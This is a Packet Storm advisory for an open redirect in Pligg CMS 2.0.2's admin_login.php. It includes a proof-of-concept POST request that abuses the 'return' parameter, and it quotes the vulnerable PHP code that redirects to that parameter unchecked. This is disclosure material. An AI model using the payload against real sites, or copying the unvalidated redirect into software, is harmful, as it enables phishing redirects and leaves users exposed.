Pligg CMS 2.0.2 Open Redirect

2015-08-18T00:00:00
ID PACKETSTORM:133146
Type packetstorm
Reporter Arash Khazaei
Modified 2015-08-18T00:00:00

Description

                                        
                                            `# Exploit Title: Pligg CMS admin_login.php Open Redirect Vulnerability  
# Google Dork: N/A  
# Date: 2015/8/18  
# Exploit Author: Arash Khazaei  
# Vendor Homepage: pligg.com  
# Software Link:  
https://github.com/Pligg/pligg-cms/releases/download/2.0.2/2.0.2.zip  
# Version: 2.0.2 (Last Version)  
# Tested on: Kali , Iceweasel Browser  
# CVE : N/A  
# Contact : http://twitter.com/0xClay  
# Site : http://bhunter.ir  
  
Introduction :  
  
Pligg CMS Is A CMS Writed In PHP Language And Licensed Under GPL v 2.0.  
An Open Redirect Vulnerability In admin_login.php File and return= Input .  
  
# POC :  
  
POST /pligg-cms-master/admin/admin_login.php HTTP/1.1  
Host: localhost  
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:31.0) Gecko/20100101  
Firefox/31.0 Iceweasel/31.8.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
Referer:  
http://localhost/pligg-cms-master/admin/admin_login.php?return=http://google.com  
Cookie: panelState=CollapseModules; PHPSESSID=9nd8tubu0j825n9ifobfibot86  
Connection: keep-alive  
Content-Type: application/x-www-form-urlencoded  
Content-Length: 75  
  
username=admin&password=admin&processlogin=1&return=http://google.com  
  
=====================  
  
Vulnerable Code :  
  
if(strpos($_SERVER['SERVER_SOFTWARE'], "IIS") && strpos(php_sapi_name(),  
"cgi") >= 0){  
echo '<SCRIPT LANGUAGE="JavaScript">window.location="'  
. $return . '";</script>';  
echo  
$main_smarty->get_config_vars('PLIGG_Visual_IIS_Logged_In') . '<a href =  
"'.$return.'">' .  
$main_smarty->get_config_vars('PLIGG_Visual_IIS_Continue') . '</a>';  
} else {  
header('Location: '.$return);  
}  
die;  
  
  
  
Discovered By : Arash Khazaei  
`